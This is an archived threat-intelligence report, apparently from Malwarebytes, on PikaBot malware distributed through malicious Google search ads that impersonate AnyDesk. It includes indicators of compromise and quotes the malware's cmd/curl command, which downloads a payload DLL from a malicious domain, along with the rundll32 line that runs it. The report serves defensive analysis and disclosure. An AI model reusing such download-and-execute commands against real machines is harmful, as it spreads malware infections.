{ "id": "b96c08a2-5b9e-486e-8916-3f3ddc996353", "created_at": "2026-04-06T00:13:13.315563Z", "updated_at": "2026-04-10T13:13:07.266534Z", "deleted_at": null, "sha1_hash": "9f2256628e764e7c9dd3f848521a33183e951b07", "title": "PikaBot distributed via malicious search ads", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 469541, "plain_text": "PikaBot distributed via malicious search ads\r\nBy Jerome Segura\r\nPublished: 2023-12-15 · Archived: 2026-04-05 20:33:08 UTC\r\nPikaBot, a stealthy malware normally distributed via malspam is now being spread via malicious ads.\r\nDuring this past year, we have seen an increase in the use of malicious ads (malvertising) and specifically those\r\nvia search engines, to drop malware targeting businesses. In fact, browser-based attacks overall have been a lot\r\nmore common if we include social engineering campaigns.\r\nCriminals have found success in acquiring new victims thanks to search ads; we believe there are specialized\r\nservices that help malware distributors and affiliates to bypass Google’s security measures and helping them to set\r\nup a decoy infrastructure. In particular, we saw similarities with the malvertising chains previously used to drop\r\nFakeBat.\r\nIn the past few days, researchers including ourselves have observed PikaBot, a new malware family that appeared\r\nin early 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns\r\nsimilarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.\r\nIn this blog post, we share details about this new campaign along with indicators of compromise.\r\nPikaBot via malspam\r\nPikaBot was first identified as a possible Matanbuchus drop from a malspam campaign by Unit 42 in February\r\n2023. The name PikaBot was later given and attributed to TA577, a threat actor that Proofpoint saw involved in\r\nthe distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt Strike. More importantly,\r\nTA577 has been associated with ransomware distribution.\r\nArticle continues below this ad.\r\nResearchers at Cofense observed a rise in malspam campaigns to deliver both DarkGate and PikaBot, following\r\nthe takedown of the QakBot botnet in August 2023. A typical distribution chain for PikaBot usually starts with an\r\nemail (hijacked thread) containing a link to an external website. Users are tricked to download a zip archive\r\ncontaining a malicious JavaScript.\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 1 of 8\n\nThe JavaScript creates a random directory structure where it retrieves the malicious payload from an external\r\nwebsite via the curl utility:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir C:\\Gkooegsglitrg\\Dkrogirbksri \u0026 curl https://keebling[.]com/Y0\r\ncurl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wk\r\nIt then executes the paylod (DLL) via rundll32:\r\nrundll32 C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll,Enter\r\nAs described by OALabs, PikaBot’s core module is then injected into the legitimate SearchProtocolHost.exe\r\nprocess. PikaBot’s loader also hides its injection by using indirect syscalls, making the malware very stealthy.\r\nDistribution via malvertising\r\nThe campaign targets Google searches for the remote application AnyDesk. Security researcher Colin Cowie\r\nobserved the distribution chain and the payload was later confirmed to be PikaBot by Ole Villadsen.\r\nWe also saw this campaign via a different ad impersonating the AnyDesk brand, belonging to the fake persona\r\n“Manca Marina”:\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 2 of 8\n\nA decoy website has been setup at anadesky[.]ovmv[.]net:\r\nThe download is a digitally signed MSI installer. It’s worth noting that it had zero detection on VirusTotal at the\r\ntime we collected it. However, the more interesting aspect is how it evades detection upon execution.\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 3 of 8\n\nThe diagram below from JoeSandbox summarizes the execution flow:\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 4 of 8\n\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 5 of 8\n\nMalvertising similarities with FakeBat\r\nThe threat actors are bypassing Google’s security checks with a tracking URL via a legitimate marketing platform\r\nto redirect to their custom domain behind Cloudflare. At this point, only clean IP addresses are forwarded to the\r\nnext step.\r\nThey perform fingerprinting via JavaScript to determine, among other things, if the user is running a virtual\r\nmachine. Only after the check is successful do we see a redirect to the main landing page (decoy AnyDesk site).\r\nWhat’s interesting is that there is a second fingerprinting attempt when the user clicks the download button. This\r\nis likely to ensure that the download link won’t work in a virtualized environment. In this particular campaign, the\r\nthreat actor is hosting the MSI installer on Dropbox.\r\nWe noticed that previous malvertising chains used the same redirection mechanism via onelink[.]me as well as\r\nURL structure. These incidents were previously reported to Google and targeted Zoom and Slack search ads:\r\nIn some of these instances, we had identified the payload as FakeBat. This is particularly interesting because it\r\npoints towards a common process used by different threat actors. Perhaps, this is something akin to “malvertising\r\nas a service” where Google ads and decoy pages are provided to malware distributors.\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 6 of 8\n\nConclusion\r\nSeveral years ago, exploit kits were the primary malware distribution vector via drive-by downloads. As\r\nvulnerabilities in the browser and its plugins began to be less effective, threat actors concentrated on spam to\r\ntarget businesses. However, some did continue to target browsers but instead had to rely on social engineering,\r\nluring victims with fake browser updates.\r\nWith malvertising, we see another powerful delivery vector that does not require the user to visit a compromised\r\nsite. Instead, threat actors are piggybacking on search engines and simply buyings ads that they know their target\r\nwill be exposed to. As we may have said before, businesses can prevent this risk by only allowing their end users\r\nto install applications via their own trusted repositories.\r\nMalwarebytes detects the malicious MSI installers as well as the web infrastructure used in these malvertising\r\ncampaigns. We have reported the malicious ads and download URLs to Google and Dropbox respectively.\r\nSpecial thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help and feedback.\r\nIndicators of Compromise\r\nMalicious domains\r\nanadesky[.]ovmv[.]net\r\ncxtensones[.]top\r\nDropbox payloads\r\ndropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1\u0026rlkey=wpbj6u5u6tja92y1t157z4cpq\r\ndropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1\u0026rlkey=h07ehkq617rxphb3asmd91xtu\r\ndropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1\u0026rlkey=qbtes3fd3v3vtlzuz8ql9t3qj\r\nPikaBot hashes\r\n0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5\r\nda81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff\r\n69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320\r\nPikaBot C2s\r\n172[.]232[.]186[.]251\r\n57[.]128[.]83[.]129\r\n57[.]128[.]164[.]11\r\n57[.]128[.]108[.]132\r\n139[.]99[.]222[.]29\r\n172[.]232[.]164[.]77\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 7 of 8\n\n54[.]37[.]79[.]82\r\n172[.]232[.]162[.]198\r\n57[.]128[.]109[.]221\r\nSource: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads" ], "report_names": [ "pikabot-distributed-via-malicious-ads" ], "threat_actors": [ { "id": "d9b39228-0d9d-4c1e-8e39-2de986120060", "created_at": "2023-01-06T13:46:39.293127Z", "updated_at": "2026-04-10T02:00:03.277123Z", "deleted_at": null, "main_name": "BelialDemon", "aliases": [ "Matanbuchus" ], "source_name": "MISPGALAXY:BelialDemon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b4f83fef-38ee-4228-9d27-dde8afece1cb", "created_at": "2023-02-15T02:01:49.569611Z", "updated_at": "2026-04-10T02:00:03.351659Z", "deleted_at": null, "main_name": "TA577", "aliases": [ "Hive0118" ], "source_name": "MISPGALAXY:TA577", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "22d450bb-fc7a-42af-9430-08887f0abf9f", "created_at": "2024-11-01T02:00:52.560354Z", "updated_at": "2026-04-10T02:00:05.276856Z", "deleted_at": null, "main_name": "TA577", "aliases": [ "TA577" ], "source_name": "MITRE:TA577", "tools": [ "Pikabot", "QakBot", "Latrodectus" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434393, "ts_updated_at": 1775826787, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9f2256628e764e7c9dd3f848521a33183e951b07.pdf", "text": "https://archive.orkl.eu/9f2256628e764e7c9dd3f848521a33183e951b07.txt", "img": "https://archive.orkl.eu/9f2256628e764e7c9dd3f848521a33183e951b07.jpg" } }